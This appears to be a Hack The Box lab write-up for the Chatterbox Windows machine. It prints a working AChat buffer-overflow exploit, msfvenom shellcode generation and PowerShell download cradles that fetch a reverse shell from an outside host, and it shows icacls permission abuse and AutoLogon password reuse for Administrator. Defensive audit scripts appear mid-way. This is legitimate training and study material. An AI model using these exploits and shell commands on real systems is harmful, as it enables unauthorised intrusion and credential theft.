Chatterbox - Hack The Box
Synopsis
Chatterbox is an Easy difficulty Windows machine. The initial foothold involves exploiting a simple buffer overflow in the AChat application. Later we abuse file permissions using icacls to read the files inside the Administrator directory. Auto Login is enabled for the Alfred user, so we can obtain the Auto Login credential using PowerUp. The same password also works for Administrator, which lets us log in as Administrator.
Skills Required
- Python
- PowerShell
- Windows Enumeration
Skills Learned
- Modifying public exploits
- Enumerating the Windows Registry
- PowerShell reverse shell
Enumeration
Nmap
# Nmap 7.60 scan initiated Sat Apr 4 00:42:06 2020 as: nmap -Pn -sC -sV -v -p9255,9256 -o full.nmap chatterbox.htb
Nmap scan report for chatterbox.htb (10.10.10.74)
Host is up (0.54s latency).
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
Looking at the nmap output we see http running on port 9255, and its version is AChat chat system httpd. On port 9256 we see the achat service running.
Running searchsploit against this application reveals that it is vulnerable to a Remote Buffer Overflow. Since we are not aware of the exact version, we initially assume it is vulnerable.
Achat 0.150 beta7 - Remote Buffer Overflow | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | exploits/windows/remote/36056.rb
We have both a python and a metasploit exploit for Achat. We'll work with the python exploit. We can copy the script by specifying the -m (mirror) flag to searchsploit.
searchsploit -m exploits/windows/remote/36025.py
#!/usr/bin/python
import socket
import sys, time
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\
#x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\
#xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\
#xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=
#EAX -f python
#payload
<BUFFER payload>
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
i=0
while i<len(p):
if i > 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
sock.close()
A few modifications need to be made before the script works for us. This is a classic buffer overflow that lets us overflow the buffer and include our own shellcode to get a reverse shell back.
We can see the msfvenom command commented out in the script. It generates the buffer payload (the buf value) while avoiding the listed bad characters. The sample payload shown in the code executes calc.exe on the target machine, so we'll change the CMD value to something that gives us a reverse shell.
We also need to change the server_address to the IP of chatterbox. There is a length limit of 1152 bytes on the payload; anything that exceeds it will probably not work, so we need to keep that in mind while generating the shellcode with msfvenom.
Initial Foothold
We'll generate the reverse shell payload using msfvenom:
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.17/Invoke-PowerShellTcp.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
After running msfvenom, the payload is generated as follows:
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 704 (iteration=0)
x86/unicode_mixed chosen with final size 704
Payload size: 704 bytes
Final size of python file: 3432 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
The resulting payload size is 704 bytes, so it is within the limit. Now we need to add this payload to the exploit. We'll start our listener and an HTTP server to serve the PowerShell file to the target in order to get the reverse shell.
Running the exploit, we get a reverse shell as Alfred.
python Achat.py
---->{P00F}!
sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.74 - - [10/Apr/2020 01:02:53] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
sudo rlwrap ncat -lvnp 9001
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.74.
Ncat: Connection from 10.10.10.74:49158.
Windows PowerShell running as user Alfred on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
chatterbox\alfred
PS C:\users\alfred\desktop> (gc user.txt).substring(0,16)
72290246dfaedb1e
Privilege Escalation
We'll start by enumerating the user and possible privesc vectors. Displaying Alfred's account info:
PS C:\users\alfred\desktop> net user alfred
User name Alfred
Full Name
Comment
User's comment
Country code 001 (United States)
Account active Yes
Account expires Never
Password last set 12/10/2017 10:18:08 AM
Password expires Never
Password changeable 12/10/2017 10:18:08 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/9/2020 3:05:55 PM
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
Looking at other users on the system, we see three users including Alfred.
PS C:\users\alfred\desktop> net users
User accounts for \\CHATTERBOX
-------------------------------------------------------------------------------
Administrator Alfred Guest
Having a look at the privileges Alfred has:
PS C:\users\alfred\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Looking at systeminfo, we observe that 208 hotfixes are installed, so it's unlikely we can escalate privileges using a kernel exploit.
PS C:\users\alfred\desktop> systeminfo
Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-223-0897461-86794
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 4/9/2020, 3:05:42 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 2 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,501 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,370 MB
Virtual Memory: In Use: 725 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
Hotfix(s): 208 Hotfix(s) Installed.
Traversing the directories, we observe that we have access to the Administrator directory, but we don't have permission to view the root flag.
PS C:\users\Administrator\Desktop> gc root.txt
PS C:\users\Administrator\Desktop> Get-Content : Access to the path 'C:\users\Administrator\Desktop\root.txt' is d
enied.
At line:1 char:3
+ gc <<<< root.txt
+ CategoryInfo : PermissionDenied: (C:\users\Administrator\Deskto
p\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsof
t.PowerShell.Commands.GetContentCommand
Viewing the permissions on root.txt, we observe that only Administrator has full access (F) on that file.
PS C:\users\administrator\desktop> icacls root.txt
root.txt CHATTERBOX\Administrator:(F)
Successfully processed 1 files; Failed processing 0 files
Since we're able to enter the desktop directory, let's check our permissions on the directory:
PS C:\users\administrator> icacls Desktop
Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
CHATTERBOX\Administrator:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CHATTERBOX\Alfred:(I)(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
We have full access (F) on the Desktop directory. The Alfred user is also configured as the owner of the root.txt file, so we can simply grant access to ourselves using icacls.
PS C:\users\administrator\desktop> icacls root.txt /grant alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files
And now we're able to view the root.txt file.
PS C:\users\administrator\desktop> (gc root.txt).substring(0,16)
a673d1b1fa95c276
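The misconfiguration abused here is that a non-privileged account owns a file inside the Administrator profile and holds full control on its parent directory; an owner can always rewrite a file's DACL, which is why the icacls /grant above succeeded. The following PowerShell audit is an added example, not part of the original write-up, that walks a directory and reports any file whose owner, or any write-capable allow ACE, belongs to a principal outside a trusted set. The $Path and $TrustedPrincipals defaults are assumptions to adjust per host, and it should be run from an elevated prompt on the host being audited.

```powershell
# Added example (not part of the original write-up): find files under a
# sensitive profile that an untrusted principal owns or can modify.
# Assumptions: elevated PowerShell on the audited host; adjust the defaults.
param(
    [string]$Path = 'C:\Users\Administrator',
    [string[]]$TrustedPrincipals = @(
        'NT AUTHORITY\SYSTEM',
        'BUILTIN\Administrators',
        "$env:COMPUTERNAME\Administrator"
    )
)

# Rights that let a principal change the file's content or its security
# descriptor (the latter is what turns "can't read" into "can read").
$writeRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership

$findings = foreach ($item in Get-ChildItem -Path $Path -Recurse -Force -ErrorAction SilentlyContinue) {
    $acl = Get-Acl -LiteralPath $item.FullName -ErrorAction SilentlyContinue
    if (-not $acl) { continue }

    # The owner can always rewrite the DACL, whatever the explicit ACEs say.
    if ($TrustedPrincipals -notcontains $acl.Owner) {
        [pscustomobject]@{ Path = $item.FullName; Principal = $acl.Owner; Issue = 'Untrusted owner' }
    }

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($TrustedPrincipals -contains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeRights) -ne 0) {
            [pscustomobject]@{
                Path      = $item.FullName
                Principal = $ace.IdentityReference.Value
                Issue     = "Allow ACE grants $($ace.FileSystemRights)"
            }
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize } else { 'No untrusted owners or write-capable ACEs found.' }
```

On this box the report would list root.txt with Alfred as an untrusted owner and Desktop with Alfred's inherited FullControl ACE; fixing it means taking ownership back as Administrator and removing Alfred's ACE from the profile.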
Privilege escalation through Auto Login creds
We can run PowerUp.ps1 and perform Invoke-AllChecks to look for possible privesc vectors.
PS C:\tmp> IEX(New-Object Net.WebClient).downloadString("http://10.10.14.17/PowerUp.ps1")
PS C:\tmp> Invoke-AllChecks <SNIP>
DefaultDomainName :
DefaultUserName : Alfred
DefaultPassword : Welcome1!
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
<SNIP>
It reveals that Auto Login is enabled for the Alfred user and its password is Welcome1!. We can try the same password for Administrator and see if it works.
We'll create a credential object for this purpose.
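PowerUp surfaces these values from the Winlogon registry key, which any local user can read. As an added example, not from the original write-up, the following PowerShell check reports whether AutoAdminLogon is turned on and whether a cleartext DefaultPassword is stored there, without displaying the secret itself, and prints the remediation. It assumes it is run locally on the host being audited; no elevation is needed to read the key.

```powershell
# Added example (not part of the original write-up): detect a cleartext
# AutoLogon password in the Winlogon key and report how to remediate it.
# Assumption: run locally on the audited host.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$props    = Get-ItemProperty -Path $winlogon

# AutoAdminLogon is a REG_SZ holding "1" when enabled.
$autoLogonOn  = ($props.AutoAdminLogon -eq '1')
# DefaultPassword is a REG_SZ readable by every local user when present.
$hasCleartext = -not [string]::IsNullOrEmpty($props.DefaultPassword)

[pscustomobject]@{
    AutoAdminLogon    = $autoLogonOn
    DefaultDomainName = $props.DefaultDomainName
    DefaultUserName   = $props.DefaultUserName
    CleartextPassword = $hasCleartext   # $true means any local user can read it
}

if ($hasCleartext) {
    Write-Warning "Cleartext DefaultPassword stored for user '$($props.DefaultUserName)'."
    Write-Warning "Remediate with: Remove-ItemProperty -Path '$winlogon' -Name DefaultPassword"
    Write-Warning "and Set-ItemProperty -Path '$winlogon' -Name AutoAdminLogon -Value 0."
    Write-Warning "If AutoLogon is really required, configure it with Sysinternals Autologon,"
    Write-Warning "which stores the password as an LSA secret instead of a world-readable string."
} elseif ($autoLogonOn) {
    'AutoAdminLogon is enabled but no cleartext DefaultPassword is present (LSA secret or misconfigured).'
} else {
    'AutoLogon is not enabled on this host.'
}
```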
PS C:\tmp> $password = convertto-securestring -AsPlainText -Force -String "Welcome1!"
PS C:\tmp> $credential = new-object -typename System.Management.Automation.PSCredential -argumentlist "chatterbox\administrator",$password;
PS C:\tmp> $credential
UserName Password
-------- --------
chatterbox\administrator System.Security.SecureString
Now we can pass this credential to Start-Process and invoke a PowerShell script from our machine to get a reverse shell as administrator.
PS C:\tmp> Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.17/Invoke-PowerShellTcp.ps1')" -Credential $credential
And we get a reverse shell as Administrator.
sudo rlwrap ncat -lnvp 9001
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.74.
Ncat: Connection from 10.10.10.74:49163.
Windows PowerShell running as user Administrator on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\tmp>whoami
chatterbox\administrator
PS C:\tmp> hostname
Chatterbox
Thank you for taking the time to read this blog!